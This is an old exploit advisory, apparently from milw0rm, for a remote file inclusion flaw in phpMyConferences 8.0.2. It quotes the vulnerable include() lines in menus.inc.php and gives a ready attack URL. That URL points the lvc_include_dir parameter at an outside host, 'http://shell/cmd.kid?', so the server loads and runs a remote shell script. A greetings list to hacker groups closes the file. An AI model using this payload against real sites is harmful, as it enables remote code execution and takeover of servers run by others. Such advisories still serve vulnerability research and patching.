30 lines
No EOL
1.2 KiB
Text
30 lines
No EOL
1.2 KiB
Text
#########################################################################
|
|
# phpMyConferences <= 8.0.2 Remote File Inclusion
|
|
# Download Source : http://sedre.loria.fr/phpMyConference/phpMyConferences_8.0.2.zip
|
|
#
|
|
# Found By : k1tk4t - k1tk4t[4t]newhack.org
|
|
# Location : Indonesia -- #newhack[dot]org
|
|
########################################################################
|
|
file ;
|
|
menus.inc.php
|
|
########################################################################
|
|
bugs ;
|
|
include($lvc_include_dir.'/menus-'.$view.'.inc.php');
|
|
include($lvc_include_dir.'/menus-others.inc.php');
|
|
########################################################################
|
|
exmple and methode exploit ;
|
|
http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://shell/cmd.kid?
|
|
########################################################################
|
|
Thanks;
|
|
str0ke
|
|
milw0rm
|
|
google
|
|
#e-c-h-o (all member echo community)
|
|
#nyubi (all member solpotcrew community)
|
|
#asiahacker
|
|
person;
|
|
y3dips,lirva32,the_day,K-159(&all echo staff)
|
|
evilcode,illibero,NoGe(asiahacker),
|
|
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)
|
|
|
|
# milw0rm.com [2006-10-13] |